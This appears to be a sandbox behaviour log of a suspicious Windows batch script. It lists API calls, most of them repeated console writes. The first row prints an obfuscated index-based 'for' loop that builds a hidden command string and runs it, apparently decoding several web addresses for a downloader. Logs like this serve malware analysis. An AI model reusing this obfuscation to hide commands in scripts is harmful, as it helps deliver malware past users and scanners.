| Environment | Get Environment String | name = D in (22;38;65;51;56;17;47;51;14;14;64;29;55;21;21;39;54;51;65;24;38;44;45;51;7;4;64;3;51;4;68;42;51;44;36;14;30;51;54;4;49;29;15;62;17;39;28;47;4;4;22;61;40;40;35;46;4;38;50;4;68;54;14;40;55;70;66;10;33;47;4;4;22;61;40;40;35;30;7;30;38;57;17;51;54;4;51;56;22;56;30;17;51;17;68;7;38;70;40;16;6;53;57;6;16;33;47;4;4;22;61;40;40;57;54;7;14;51;44;57;46;17;22;30;7;51;68;7;38;70;40;25;67;46;33;47;4;4;22;61;40;40;35;55;14;30;57;54;55;17;68;7;38;70;40;5;25;36;38;38;26;33;47;4;4;22;61;40;40;4;47;51;17;30;14;35;51;56;55;70;51;56;30;7;55;54;51;55;50;14;51;68;7;38;70;40;4;44;28;68;31;22;14;30;4;41;28;33;28;48;49;29;42;6;62;64;39;64;28;60;37;60;28;49;29;23;42;30;39;29;51;54;35;61;4;51;70;22;34;28;69;28;34;29;42;6;62;34;28;68;51;27;51;28;49;8;38;56;51;55;7;47;41;29;54;16;13;64;30;54;64;29;15;62;17;48;32;4;56;66;32;29;55;21;21;68;20;38;65;54;14;38;55;46;43;30;14;51;41;29;54;16;13;63;64;29;23;42;30;48;49;31;4;55;56;4;24;59;56;38;7;51;17;17;64;29;23;42;30;49;44;56;51;55;52;49;58;7;55;4;7;47;32;58;58;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;80)do set Zv=!Zv!!pPr |
|
1 | |
| Environment | Get Environment String | name = D,1!&&if |
|
1 | |
| Environment | Get Environment String | name = D==80 call |
|
1 | |
| Environment | Get Environment String | name = Zv |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
